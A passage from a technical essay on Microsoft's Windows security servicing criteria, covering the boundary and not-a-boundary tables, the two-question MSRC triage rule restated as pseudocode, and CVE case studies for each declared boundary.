        2014 : CVE-2014-4113 Win32k EoP becomes canonical kernel-boundary case
    section Generation 3 - VTL added (2015 to 2017)
        2015 : Windows 10 1507 ships VBS, Secure Kernel, Credential Guard
        2016 : Edge AppContainer sandbox cements the browser boundary entry
        2017 : EternalBlue and MS17-010 anchor the network-boundary case study
    section Generation 4 - Stabilised reference (2018 to 2024)
        2023 : Landau PPLFault names PPL as not a security boundary
        2024 : Landau ItsNotASecurityBoundary homages MSRC policy in repo name
        2024 : Leviev Windows Downdate at Black Hat USA 2024
    section Generation 5 - Administrator Protection (2024 to 2026)
        2024 : Ignite keynote announces Administrator Protection as new boundary
        2025 : Developer-blog detail post lands
        2025 : October non-security update KB5067036 rolls out and is reverted
        2026 : Forshaw publishes nine pre-GA bypasses via Project Zero
&lt;p&gt;The December 1, 2025 rollout revert of the October 2025 non-security update KB5067036 is an application-compatibility decision, not a doctrinal one [@ms-learn-admin-protection]. The Microsoft Learn page now reads that the feature will roll out &quot;at a later date.&quot; The boundary classification stands; the rollout schedule slipped.&lt;/p&gt;
&lt;p&gt;Five generations later, the boundary table has nine entries. The next section walks the parallel evolution that nobody outside MSRC reads first -- the not-a-boundary table -- because that is the table that decides what does &lt;em&gt;not&lt;/em&gt; get a CVE.&lt;/p&gt;
&lt;h2&gt;5. The Not-a-Boundary Table Also Accumulates&lt;/h2&gt;
&lt;p&gt;For every boundary Microsoft has added to the servicing-criteria table, there is a primitive that did not make the list. The not-a-boundary table tells a parallel story: primitives that attackers repeatedly tried to make into boundaries, and that Microsoft repeatedly classified as features. Seven entries, each tied to a load-bearing research artifact.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;User Account Control (since June 2007).&lt;/strong&gt; The original not-a-boundary entry; see Section 8.1 for the full treatment.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Driver Signing / Code Integrity / KMCS (since the Vista x64 kernel-mode driver signing requirement).&lt;/strong&gt; Local administrator can, by design, load drivers; see Section 8.2. The &quot;bring your own vulnerable driver&quot; (BYOVD) catalog and the &lt;a href=&quot;https://www.loldrivers.io/&quot; rel=&quot;noopener&quot;&gt;LOLDrivers project&lt;/a&gt; are the institutional memory [@loldrivers].&lt;/p&gt;

*BYOVD* is the attack pattern in which a privileged user installs a legitimately-signed driver that happens to contain an exploitable vulnerability, then exploits the driver to obtain arbitrary kernel-mode code execution. Because Driver Signing is on the security-feature side of the doctrine, a BYOVD chain that exploits a signed driver does not, on its own, receive a CVE attributed to Microsoft -- the driver vendor may receive one, but Microsoft does not classify the loadability of the driver as a boundary crossing. The Lazarus Group&apos;s use of expired-but-signed drivers and the broader [LOLDrivers catalog](https://www.loldrivers.io/) are the operational embodiment of this classification [@loldrivers].
&lt;p&gt;&lt;strong&gt;Microsoft Defender / Antimalware.&lt;/strong&gt; A heuristic detection layer cannot, by construction, be a boundary. Defender bypasses earn CVEs only when they also cross another boundary (see Section 8.3 for the Tavis Ormandy 2014 to 2017 network-boundary pattern; the flagship CVE-2017-0290 &lt;em&gt;crazy bad&lt;/em&gt; MsMpEng RCE is the canonical example [@ms-advisory-4022344]).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;HVCI / Memory Integrity.&lt;/strong&gt; A feature enforced &lt;em&gt;at&lt;/em&gt; the VTL boundary, not itself a boundary; see Section 8.4.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Protected Process Light (PPL).&lt;/strong&gt; Introduced in Windows 8.1 to protect anti-malware services and other specially-signed processes from administrator tampering [@ms-learn-am-ppl]. Gabriel Landau&apos;s PPLFault research preserves the verbatim MSRC position that PPL is not a security boundary; see Section 8.5 for the full Landau quotation [@landau-pplfault].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Administrator-to-kernel privilege escalation.&lt;/strong&gt; Local administrator can, by design, load drivers; see Section 8.6. Gabriel Landau named his False File Immutability research repository &lt;em&gt;ItsNotASecurityBoundary&lt;/em&gt; as an explicit homage to MSRC&apos;s policy [@landau-itsnotasb-gh]; Alon Leviev&apos;s October 2024 Downdate follow-up contains the most recent verbatim Microsoft quotation of this position (see Section 8.6) [@leviev-downdate-update].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Same-user post-authentication.&lt;/strong&gt; Once a process has executed under a user&apos;s session, it inherits that user&apos;s trust; per-process isolation within the same user is not a declared boundary. James Forshaw&apos;s June 3, 2024 &lt;em&gt;Working your way Around an ACL&lt;/em&gt; post is the doctrinal anchor (see Section 8.7 for the verbatim formulation) [@forshaw-tyranid-acl].&lt;/p&gt;
&lt;p&gt;Here are the two tables side by side.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;The boundary table (nine entries)&lt;/th&gt;
&lt;th&gt;What enforces it&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Network&lt;/td&gt;
&lt;td&gt;NDIS/TCP-IP/SMB/RPC stack; remote callers are the lowest trust tier&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;SYSCALL/SYSRET transition, syscall service table, Driver Verifier, HVCI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Process&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SeAccessCheck&lt;/code&gt; on &lt;code&gt;PROCESS_VM_READ&lt;/code&gt;, &lt;code&gt;PROCESS_VM_WRITE&lt;/code&gt;, &lt;code&gt;NtDuplicateObject&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Session&lt;/td&gt;
&lt;td&gt;Session 0 vs Session 1+; per-session &lt;code&gt;BaseNamedObjects&lt;/code&gt; namespace isolation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;User&lt;/td&gt;
&lt;td&gt;Per-user SIDs in SAM, file-system DACL inheritance, per-user &lt;code&gt;HKCU&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AppContainer&lt;/td&gt;
&lt;td&gt;LowBox token + capability SID list + DENY-by-default ACLs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Virtual machine (guest-to-host)&lt;/td&gt;
&lt;td&gt;Hyper-V root partition, VMBus, synthetic device model&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;VTL (VTL0 to VTL1)&lt;/td&gt;
&lt;td&gt;Hypervisor-enforced SLAT (Intel EPT / AMD NPT); VSL hypercalls as the only cross-VTL channel&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Administrator Protection elevation path (2025)&lt;/td&gt;
&lt;td&gt;SMAA with separate SID, profile, logon session; Windows Hello consent&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;The not-a-boundary table (seven entries)&lt;/th&gt;
&lt;th&gt;Why it is a feature, not a boundary&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;UAC&lt;/td&gt;
&lt;td&gt;Split token shares SID, profile, session, namespace; no policy guarantee&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Driver Signing / Code Integrity / KMCS&lt;/td&gt;
&lt;td&gt;Administrators can install drivers by design&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft Defender / Antimalware&lt;/td&gt;
&lt;td&gt;Heuristic detection cannot guarantee detection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HVCI / Memory Integrity&lt;/td&gt;
&lt;td&gt;A feature enforced &lt;em&gt;at&lt;/em&gt; the VTL boundary, not itself a boundary&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Protected Process Light (PPL)&lt;/td&gt;
&lt;td&gt;Hardened against admin tampering, not policy-guaranteed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Administrator-to-kernel privilege escalation&lt;/td&gt;
&lt;td&gt;Admin loads drivers; drivers run in kernel; structural&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Same-user post-authentication&lt;/td&gt;
&lt;td&gt;One user, one trust scope; per-process isolation not declared&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The not-a-boundary table is the doctrine &lt;em&gt;learning&lt;/em&gt;. Each new entry is a primitive an attacker class repeatedly tried to treat as a boundary, and Microsoft explicitly classified as a feature so the operational question -- &lt;em&gt;does this report receive a CVE?&lt;/em&gt; -- has a stable answer.&lt;/p&gt;
&lt;p&gt;Two tables. Sixteen total entries. One operational question per report. But how does Microsoft actually apply this -- and why is the application &lt;em&gt;correct&lt;/em&gt;, not a cop-out?&lt;/p&gt;
&lt;h2&gt;6. The Two-Question Triage Rule&lt;/h2&gt;
&lt;p&gt;Here is the load-bearing engineering decision of the entire document: the classification question is &lt;em&gt;decoupled&lt;/em&gt; from the severity question. Microsoft does not ask &quot;is this report important enough to fix&quot; as a single judgment call. It asks two separate questions, and both have to be answered yes.&lt;/p&gt;
&lt;p&gt;The MSRC servicing-criteria page states the rule verbatim:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;The criteria used by Microsoft when evaluating whether to provide a security update or guidance for a reported vulnerability involves answering two key questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Does the vulnerability violate the goal or intent of a security boundary or a security feature?&lt;/li&gt;
&lt;li&gt;Does the severity of the vulnerability meet the bar for servicing?&quot; [@msrc-criteria]&lt;/li&gt;
&lt;/ol&gt;
&lt;/blockquote&gt;
&lt;p&gt;The second question is parameterised by a separate document, the &lt;em&gt;Microsoft Vulnerability Severity Classification for Windows&lt;/em&gt;, often called the &lt;em&gt;Windows Bug Bar&lt;/em&gt; [@msrc-bugbar]. The Bug Bar defines four severity levels -- Critical, Important, Moderate, Low -- with worked examples for each vulnerability type (remote code execution, elevation of privilege, information disclosure, denial of service, spoofing, tampering). It also pivots between server and client severity. A bug that earns Critical on a server can earn Important on a client, and the disposition can change accordingly.&lt;/p&gt;
&lt;p&gt;The first question answers the &lt;em&gt;eligible-by-doctrine&lt;/em&gt; half. A boundary crossing is in scope. A feature defeat is &lt;em&gt;also&lt;/em&gt; in scope -- Microsoft does service security features when the severity bar is met, but the path is different. The second question answers &lt;em&gt;severity-meets-bar&lt;/em&gt;. Critical and Important on the Bug Bar route to a security update via Patch Tuesday (or out-of-band when the impact warrants it). Moderate and Low route to &quot;consider for the next version or release of Windows.&quot;&lt;/p&gt;
&lt;p&gt;The doctrine has an explicit relief valve.&lt;/p&gt;

If the answer to both questions is yes, then Microsoft&apos;s intent is to address the vulnerability through a security update and/or guidance ... If the answer to either question is no, then by default the vulnerability will be considered for the next version or release of Windows but will not be addressed through a security update or guidance, though exceptions may be made. -- Microsoft Security Servicing Criteria for Windows [@msrc-criteria]
&lt;p&gt;Notice the work the &lt;em&gt;and&lt;/em&gt; is doing. Two independent gates, both required. A feature defeat with Critical impact (for example, a Defender bypass that enables ransomware deployment at scale) &lt;em&gt;can&lt;/em&gt; still ship as a Patch Tuesday item -- but it does so via the second question, with the explicit exception clause as the framing. A boundary crossing with Low severity (a process-isolation primitive bypass that requires preconditions no realistic attacker would arrange) might &lt;em&gt;not&lt;/em&gt; ship as a bulletin.&lt;/p&gt;

flowchart TD
    Report[&quot;Vulnerability report arrives at MSRC&quot;]
    Q1{&quot;Q1: Does it violate a boundary or feature?&quot;}
    Q2{&quot;Q2: Does severity meet the bar (Critical or Important)?&quot;}
    Excp{&quot;Exception applies?&quot;}
    Service[&quot;Service via security update / Patch Tuesday&quot;]
    Defer[&quot;By design / consider for next release&quot;]
    Report --&amp;gt; Q1
    Q1 -- &quot;No&quot; --&amp;gt; Excp
    Q1 -- &quot;Yes&quot; --&amp;gt; Q2
    Q2 -- &quot;Yes&quot; --&amp;gt; Service
    Q2 -- &quot;No&quot; --&amp;gt; Excp
    Excp -- &quot;Yes&quot; --&amp;gt; Service
    Excp -- &quot;No&quot; --&amp;gt; Defer
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Classification and severity are decoupled. The &lt;em&gt;and&lt;/em&gt; of the two questions is the doctrine. Every &quot;by design&quot; reply the community has ever received is generated by this exact rule, applied with the published boundary list, the published feature list, the published severity bar, and the published exception clause.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The rule, restated as runnable pseudocode, looks like this. Try the three example inputs to see the doctrine in action.&lt;/p&gt;
&lt;p&gt;{`
// The MSRC servicing-criteria triage, in pseudocode.
const BOUNDARIES = new Set([
  &quot;network&quot;, &quot;kernel&quot;, &quot;process&quot;, &quot;session&quot;, &quot;user&quot;,
  &quot;appcontainer&quot;, &quot;vm&quot;, &quot;vtl&quot;, &quot;administrator-protection&quot;,
]);
const FEATURES = new Set([
  &quot;uac&quot;, &quot;defender&quot;, &quot;hvci&quot;, &quot;driver-signing&quot;,
  &quot;ppl&quot;, &quot;admin-to-kernel&quot;, &quot;same-user&quot;,
]);&lt;/p&gt;
&lt;p&gt;function disposition(report) {
  const { primitive, severity, exception } = report;
  const isBoundary = BOUNDARIES.has(primitive);
  const isFeature  = FEATURES.has(primitive);
  const violatedSomething = isBoundary || isFeature;
  const meetsBar = (severity === &quot;Critical&quot; || severity === &quot;Important&quot;);
  if (violatedSomething &amp;amp;&amp;amp; meetsBar) return &quot;Service via security update&quot;;
  if (exception)                     return &quot;Service via security update (exception)&quot;;
  return &quot;By design / consider for next version&quot;;
}&lt;/p&gt;
&lt;p&gt;// Example 1: a fresh UAC bypass (consent.exe registry hijack)
console.log(&quot;UAC bypass    -&amp;gt;&quot;,
  disposition({ primitive: &quot;uac&quot;, severity: &quot;Important&quot; }));&lt;/p&gt;
&lt;p&gt;// Example 2: a pre-auth SMB RCE like CVE-2017-0144 EternalBlue
console.log(&quot;SMB pre-auth  -&amp;gt;&quot;,
  disposition({ primitive: &quot;network&quot;, severity: &quot;Critical&quot; }));&lt;/p&gt;
&lt;p&gt;// Example 3: a PPLFault-class bypass loading unsigned code into a PPL
console.log(&quot;PPLFault      -&amp;gt;&quot;,
  disposition({ primitive: &quot;ppl&quot;, severity: &quot;Important&quot; }));
`}&lt;/p&gt;
&lt;p&gt;Run it. The UAC bypass returns &quot;Service via security update&quot; only because UAC is on the &lt;em&gt;feature&lt;/em&gt; table -- so the first question is yes (a feature defeat) and the second question is yes (Important severity) -- and &lt;em&gt;both&lt;/em&gt; questions matter. If you change the severity to Moderate the disposition flips to &quot;by design / consider for next version.&quot; If you change the primitive to one that is not on either table, the disposition again becomes &quot;by design&quot; unless the exception clause fires.&lt;/p&gt;
&lt;p&gt;That is the entire MSRC triage rule. Nine boundary entries, seven feature entries, one severity scheme, one exception clause. Every &quot;by design&quot; reply the community has ever received is generated by this exact rule.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A single-question rule would collapse the doctrine. &quot;Is this report important enough to fix&quot; without a published classification turns every disposition into MSRC engineers&apos; personal judgment. &quot;Is this a boundary crossing&quot; without a severity gate would force Microsoft to ship a Patch Tuesday bulletin for every low-impact boundary-adjacent finding, including the ones with no realistic attack path. Decoupling lets Microsoft commit to a published taxonomy on the first question while retaining engineering judgment on the second, with the exception clause as the explicit relief valve in either direction.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;With the rule in hand, the next three sections walk the parameters of the rule -- the nine boundary entries, the seven feature entries, and the bounty schedule that mechanically follows both -- at one consistent pedagogical depth per entry.&lt;/p&gt;
&lt;h2&gt;7. The Nine Boundaries, Walked&lt;/h2&gt;
&lt;p&gt;One subsection per boundary. Each follows the same template: the architectural primitive that enforces the boundary, the canonical CVE-eligible violation pattern, and one verified historical case study.&lt;/p&gt;
&lt;h3&gt;7.1 Network boundary&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Primitive.&lt;/strong&gt; The NDIS / TCP-IP / SMB / RPC / HTTP server stacks treat remote callers as the lowest trust tier. Any code that processes attacker-influenced bytes off the wire before authenticating the caller sits at this boundary.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Violation.&lt;/strong&gt; Pre-authentication remote code execution. A remote attacker reaches &lt;code&gt;SYSTEM&lt;/code&gt; (or any local code execution) without first satisfying an authentication primitive.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Case study.&lt;/strong&gt; EternalBlue, CVE-2017-0144, MS17-010. The SMBv1 server in Windows Vista SP2 through Windows 10 1607 accepted crafted packets that triggered a memory-corruption primitive in the kernel-mode driver, yielding pre-authentication remote code execution [@nvd-2017-0144]. NSA-developed; Shadow Brokers-leaked; weaponised within weeks by WannaCry and NotPetya. Critical severity, mandatory patch, the canonical network-boundary case in the entire taxonomy. SMBGhost (CVE-2020-0796) [@nvd-2020-0796] and PrintNightmare (CVE-2021-34527) [@nvd-2021-34527] are the supporting cases. PrintNightmare is particularly instructive because it crosses &lt;em&gt;two&lt;/em&gt; boundaries simultaneously -- remote code execution via a malicious shared printer driver (network) &lt;em&gt;and&lt;/em&gt; local privilege escalation via the same primitive on the spooler service (kernel).&lt;/p&gt;
&lt;h3&gt;7.2 Kernel boundary&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Primitive.&lt;/strong&gt; The user-mode-to-kernel-mode transition is enforced by the CPU&apos;s privilege rings and the SYSCALL/SYSRET instruction pair. The syscall service table is the only legal way to enter the kernel. Driver Verifier and HVCI run on top of this transition.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Violation.&lt;/strong&gt; User-mode code achieves kernel-mode code execution without using the legitimate syscall interface, typically by exploiting a memory-safety bug in a kernel driver that the user-mode caller can reach.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Case study.&lt;/strong&gt; CVE-2014-4113, the Win32k.sys &lt;code&gt;tagWND&lt;/code&gt; elevation-of-privilege bug, exploited in the wild in October 2014.The Win32k subsystem is a recurring source of kernel-boundary findings because it processes window-manager state from user mode in kernel context, an architectural choice that predates the boundary doctrine. MS14-058 / KB3000061 was the Patch Tuesday fix on October 14, 2014 [@ms-bulletin-ms14-058]. The bug allowed a local user to run arbitrary code in kernel mode by crafting calls to the kernel-mode portion of the Win32 subsystem [@nvd-2014-4113]. Important severity; canonical kernel-boundary case; the kind of finding the doctrine was built to service cleanly.&lt;/p&gt;

*`SeAccessCheck`* is the Windows kernel&apos;s reference-monitor function that decides whether a thread holding a specific access token may perform a requested access against a securable object. It takes the object&apos;s security descriptor, the requesting token, and the desired access mask; it returns granted access or `STATUS_ACCESS_DENIED`. Every cross-process memory access, every securable kernel-object open, and every registry-key access ultimately routes through this function. It is the architectural enforcement point for both the process boundary and the user boundary.
&lt;h3&gt;7.3 Process boundary&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Primitive.&lt;/strong&gt; &lt;code&gt;SeAccessCheck&lt;/code&gt; mediates &lt;code&gt;PROCESS_VM_READ&lt;/code&gt;, &lt;code&gt;PROCESS_VM_WRITE&lt;/code&gt;, &lt;code&gt;PROCESS_DUP_HANDLE&lt;/code&gt;, and the access mask passed to &lt;code&gt;NtOpenProcess&lt;/code&gt; [@ms-learn-process-access-rights]. A process cannot read another process&apos;s memory without holding a token that grants the requested access against the target&apos;s security descriptor.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Violation.&lt;/strong&gt; One process reads or writes another process&apos;s address space without having been granted permission.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Case study.&lt;/strong&gt; Thread injection canon: &lt;code&gt;CreateRemoteThread&lt;/code&gt;, &lt;code&gt;SetWindowsHookEx&lt;/code&gt;, &lt;code&gt;NtMapViewOfSection&lt;/code&gt;. Each violation routes through a documented OS primitive that Microsoft has hardened repeatedly. The hardening culminated in the &lt;a href=&quot;https://paragmali.com/blog/protected-process-light-when-the-administrator-isnt-enough/&quot; rel=&quot;noopener&quot;&gt;Protected Process Light&lt;/a&gt; (PPL) signer-hierarchy enforcement introduced in Windows 8.1, which lets specially-signed processes refuse code injection even from administrator processes [@ms-learn-am-ppl]. PPL itself is on the feature side of the doctrine -- &lt;em&gt;the&lt;/em&gt; canonical example of how the process boundary and PPL interact is the AM-PPL extension that anti-malware vendors use to protect their services from administrator-level interference, which Landau&apos;s research has explored at length [@landau-pplfault].The access-mask argument to &lt;code&gt;NtOpenProcess&lt;/code&gt; is the load-bearing enforcement point. A thread that opens a target process with &lt;code&gt;PROCESS_VM_READ&lt;/code&gt; and then calls &lt;code&gt;ReadProcessMemory&lt;/code&gt; is exercising an &lt;em&gt;audited&lt;/em&gt; boundary crossing; a thread that obtains the target&apos;s handle through a more circuitous route (handle duplication, named-object games) still routes through &lt;code&gt;SeAccessCheck&lt;/code&gt; somewhere. The taxonomy is what gives the audit something to anchor against.&lt;/p&gt;
&lt;h3&gt;7.4 Session boundary&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Primitive.&lt;/strong&gt; Session 0 (system services) is isolated from interactive user sessions (Session 1, Session 2, and so on). Each session has its own &lt;code&gt;\Sessions\&amp;lt;id&amp;gt;\BaseNamedObjects&lt;/code&gt; namespace, its own window station, and its own desktop [@ms-learn-kernel-object-namespaces]. Services that previously ran in the interactive session of the first logged-in user now run in Session 0 with no GUI.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Violation.&lt;/strong&gt; A low-privilege interactive process sends window messages to a &lt;code&gt;SYSTEM&lt;/code&gt;-level service on the same desktop, driving the service&apos;s UI into executing attacker-controlled code paths.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Case study.&lt;/strong&gt; The August 2002 Shatter class, generalised by Brett Moore in &lt;em&gt;Shattering By Example&lt;/em&gt; (2003) [@exploit-db-21691]. Microsoft&apos;s architectural response shipped with Windows Vista: Session 0 isolation. Services were moved to Session 0 with no interactive desktop; user applications run in Session 1 and higher. The Microsoft Learn &lt;em&gt;Interactive Services&lt;/em&gt; page records the engineering decision verbatim: &lt;em&gt;&quot;Services cannot directly interact with a user as of Windows Vista. Therefore, the techniques mentioned in the section titled Using an Interactive Service should not be used in new code&quot;&lt;/em&gt; [@ms-learn-interactive-services].&lt;/p&gt;
&lt;h3&gt;7.5 User boundary&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Primitive.&lt;/strong&gt; Per-user SIDs in the SAM database (or the domain database for joined hosts), file-system DACL inheritance, per-user &lt;code&gt;HKCU&lt;/code&gt; registry hives, the user profile directory, and the access token that travels with every thread [@ms-learn-access-tokens]. A process running as one user cannot access objects owned by another user unless the DACL explicitly permits it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Violation.&lt;/strong&gt; One user&apos;s process reads another user&apos;s data without permission. Classic targets: &lt;code&gt;NTUSER.DAT&lt;/code&gt; of another logged-on user, the other user&apos;s &lt;code&gt;%USERPROFILE%&lt;/code&gt;, the other user&apos;s tokens via &lt;code&gt;NtOpenProcess&lt;/code&gt; or &lt;code&gt;NtOpenProcessToken&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Case study.&lt;/strong&gt; The user boundary is the &lt;em&gt;example&lt;/em&gt; Russinovich uses in his June 2007 article when contrasting boundaries with conveniences [@russinovich-vista-uac-wayback]. User-to-user separation is the canonical &quot;yes, this is a boundary&quot; case in the entire taxonomy; the closest &lt;em&gt;same-user&lt;/em&gt; counter-example -- Forshaw&apos;s June 2024 Recall ACL post -- explicitly notes that &lt;em&gt;user-to-user&lt;/em&gt; would be a boundary, but &lt;em&gt;same-user&lt;/em&gt; per-process isolation is not [@forshaw-tyranid-acl]. The boundary granularity matters: the same primitive class can be a boundary at one granularity and a non-boundary at a finer granularity.&lt;/p&gt;

This is the cleanest illustration of how granularity drives classification. *User to user* is a boundary -- Alice&apos;s process cannot read Bob&apos;s data without explicit permission. *Same user, process to process* is not a boundary -- Alice&apos;s text editor, Alice&apos;s browser, and Alice&apos;s media player all run with Alice&apos;s identity and any one of them can read the others&apos; resources. PPL adds a feature-class barrier within the same user, but Microsoft has explicitly classified PPL as not a boundary [@landau-pplfault]. The taxonomy is consistent: the same primitive (the access token) can guarantee separation across user identities and *not* guarantee separation between two processes that share an identity.
&lt;h3&gt;7.6 AppContainer / sandbox boundary&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Primitive.&lt;/strong&gt; A &lt;a href=&quot;https://paragmali.com/blog/appcontainer-and-lowbox-tokens-windowss-capability-sandbox/&quot; rel=&quot;noopener&quot;&gt;LowBox token&lt;/a&gt; with a capability SID list; default-DENY ACLs against any object that has not explicitly granted the relevant capability; restricted access to the file system, the registry, named objects, and the network stack. AppContainer is built on top of the Mandatory Integrity Control mechanism but is strictly more restrictive than a Low IL token.&lt;/p&gt;

*MIC* is the Windows mechanism that assigns each securable object and each access token an integrity level: Untrusted, Low, Medium (the default for standard users), High (the default for administrators), and System. The access-check rules state that a lower-integrity subject cannot write to a higher-integrity object, regardless of DACL permissions. Introduced in Vista alongside UIPI, MIC underpins both the AppContainer boundary and the UAC feature.
&lt;p&gt;&lt;strong&gt;Violation.&lt;/strong&gt; A LowBox or AppContainer process escapes its capability list to perform operations the container was supposed to deny.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Case study.&lt;/strong&gt; Edge sandbox escape canon, from the Anniversary Update (Windows 10 1607, August 2016) forward. AppContainer as a mechanism predates 1607 (it shipped in Windows 8 alongside the Modern UI app model, where it was originally named &lt;em&gt;LowBox&lt;/em&gt;) [@ms-learn-appcontainer-legacy], but the Edge sandbox is the flagship demonstration that AppContainer can serve as a browser-grade sandbox boundary. Edge sandbox escapes route through MSRC as boundary violations and earn the Microsoft Edge Bounty Program payouts [@msrc-bounty-edge].&lt;/p&gt;
&lt;h3&gt;7.7 Virtual machine (guest-to-host) boundary&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Primitive.&lt;/strong&gt; Hyper-V&apos;s root partition versus L1 guest partitions, the &lt;a href=&quot;https://paragmali.com/blog/hyper-v-enlightenments-vmbus-and-the-synthetic-device-model/&quot; rel=&quot;noopener&quot;&gt;VMBus&lt;/a&gt; inter-partition channel, the synthetic device model, the virtualization-service-provider (VSP) and virtualization-service-client (VSC) split. A guest VM communicates with the host only via VMBus, and only through the synthetic devices the host exposes.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Violation.&lt;/strong&gt; A guest VM achieves code execution on the host (or in a sibling guest).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Case study.&lt;/strong&gt; CVE-2024-21407, a use-after-free in a Hyper-V root-partition component reachable from a guest VM (the MSRC advisory does not name the component), shipped as a Critical-severity Patch Tuesday item on March 12, 2024 [@nvd-2024-21407]. The guest-to-host class pays the highest bounty in the Microsoft Bounty Programs portfolio.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Microsoft Hyper-V Bounty Program pays $5,000 to $250,000 USD for guest-to-host escape vulnerabilities [@msrc-bounty-hyperv]. That is the highest single-finding payout in the Microsoft bounty catalogue [@msrc-bounty-root], and it maps directly to the VM boundary on the servicing-criteria table. The bounty schedule is one of the cleanest market-side confirmations available that the boundary list drives every other operational artifact: the boundary that protects the most consequential trust separation (cloud tenant from cloud tenant on shared hypervisor hardware) also pays the most.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;7.8 VTL (VTL0 to VTL1) boundary&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Primitive.&lt;/strong&gt; Hypervisor-enforced second-level address translation (SLAT, implemented as Intel EPT or AMD NPT) separates the address spaces of VTL0 (the normal kernel and user mode) and VTL1 (the Secure Kernel and Isolated User Mode). The hypervisor mediates every cross-VTL access. The only documented cross-VTL channel is the Virtual Secure Mode hypercall pair (&lt;code&gt;HvCallVtlCall&lt;/code&gt; and &lt;code&gt;HvCallVtlReturn&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Violation.&lt;/strong&gt; A VTL0 attacker observes or modifies VTL1 memory or Trustlet state.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Case study.&lt;/strong&gt; &lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt; / Isolated LSA is the canonical VTL1 success story. The LSA Trustlet (LsaIso) holds the credential material Credential Guard protects; even an &lt;code&gt;NT AUTHORITY\SYSTEM&lt;/code&gt;-class attacker in VTL0 cannot read those credentials because the relevant pages are not mapped into the VTL0 kernel&apos;s address space at all [@ms-learn-vbs-ci]. The doctrine has a row that says so, and the bounty schedule pays Critical-class amounts under the Windows Insider Preview Bounty Program for VTL violations.&lt;/p&gt;

*Virtual Trust Levels* are the hypervisor-enforced trust tiers Hyper-V introduces inside a single guest partition [@ms-learn-vbs-ci]. VTL0 is the &quot;normal&quot; Windows world: the regular kernel, regular drivers, and regular user-mode processes. VTL1 is the secure world: the Secure Kernel and Isolated User Mode (IUM), where Trustlets like LsaIso run. The hypervisor&apos;s SLAT tables enforce the separation: VTL0 page-table entries that would let the normal kernel read VTL1 memory simply fail the SLAT check at hardware-page-fault granularity. The only cross-VTL channel is the VSL hypercall pair. The VTL boundary is the strongest local boundary on Windows.
&lt;h3&gt;7.9 Administrator Protection elevation path (2025 addition)&lt;/h3&gt;
